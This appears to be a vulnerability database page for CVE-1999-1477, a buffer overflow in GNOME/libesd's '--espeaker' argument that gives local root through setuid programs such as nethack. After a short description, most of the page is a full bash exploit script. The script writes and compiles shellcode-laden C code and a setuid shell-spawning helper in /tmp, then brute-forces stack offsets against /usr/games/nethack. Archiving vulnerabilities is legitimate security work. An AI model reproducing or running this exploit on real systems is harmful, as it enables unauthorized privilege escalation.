CVE-1999-1477 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

source: https://www.securityfocus.com/bid/663/info A buffer overflow vulnerabilityin GNOME's shared libraries handling of the 'espeaker' command line argument may allow local users to attack setuid binaries linked against these libraries to obtain root access. Calling a program linked against GNOME with the command like arguments '--enable-sound --espeaker=<80 byte buffer>' results in a buffer overflow. One known setuid root program linked against these libraries in the Mandrake 6.0 distribution is '/usr/games/nethack'. It is likely this is a vulnerability in the libesd shared library instead of libgnome. In that case esound 0.2.8 would be vulnerable. #!/bin/bash # Generic exploit for GNOME apps under Linux x86 # Our overflowed buffer is just 80 bytes so we'll have to get our settings # just so. Hence the shell script. # # This should work against any su/gid GNOME program. The only one that comes # with RH6.0 that is su/gid root is (the irony is killing me) nethack. # # Change the /usr/games/nethack statement in the while loop below to exploit # a different program. # # -Brock Tellier [email protected] echo "Building /tmp/gnox.c..." cat > /tmp/gnox.c <<EOF /* * Generic GNOME overflow exploit for Linux x86, tested on RH6.0 * Will work against any program using the GNOME libraries in the form * Keep your BUFSIZ at 90 and only modify your offset * */ #include <stdlib.h> #include <stdio.h> char gnoshell[]= /* Generic Linux x86 shellcode modified to run our program */ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/tmp/gn"; #define LEN 120 #define BUFLEN 90 /* no need to change this */ #define NOP 0x90 #define DEFAULT_OFFSET 300 unsigned long get_sp(void) { __asm__("movl %esp, %eax"); } void main(int argc, char *argv[]) { int offset, i; int buflen = BUFLEN; long int addr; char buf[BUFLEN]; char gnobuf[LEN]; if(argc > 2) { fprintf(stderr, "Error: Usage: %s <offset>\n", argv[0]); exit(0); } else if (argc == 2){ offset=atoi(argv[1]); } else { offset=DEFAULT_OFFSET; } addr=get_sp(); fprintf(stderr, "Generic GNOME exploit for Linux x86\n"); fprintf(stderr, "Brock Tellier [email protected]\n\n"); fprintf(stderr, "Using addr: 0x%x buflen:%d offset:%d\n", addr-offset, buflen, offset); memset(buf,NOP,buflen); memcpy(buf+35,gnoshell,strlen(gnoshell)); for(i=35+strlen(gnoshell);i<buflen-4;i+=4) *(int *)&buf[i]=addr-offset; sprintf(gnobuf, "--enable-sound --espeaker=%s", buf); for(i=0;i<strlen(gnobuf);i++) putchar(gnobuf[i]); } EOF echo "...done!" echo "Building /tmp/gn.c..." cat > /tmp/gn.c <<EOF #include <unistd.h> void main() { printf("before: uid=%d, euid=%d, gid=%d, egid=%d\n", getuid(), geteuid(), getgid(), getegid()); setreuid(geteuid(), geteuid()); setregid(getegid(), getegid()); printf("after: uid=%d, euid=%d, gid=%d, egid=%d\n", getuid(), geteuid(), getgid(), getegid()); system("/bin/bash"); } EOF echo "...done!" echo "Compiling /tmp/gnox..." gcc -o /tmp/gnox /tmp/gnox.c echo "...done!" echo "Compiling /tmp/gn..." gcc -o /tmp/gn /tmp/gn.c echo "...done!" echo "Launching attack..." offset=0 while [ $offset -lt 10000 ]; do /usr/games/nethack `/tmp/gnox $offset` offset=`expr $offset + 4` done echo "...done!"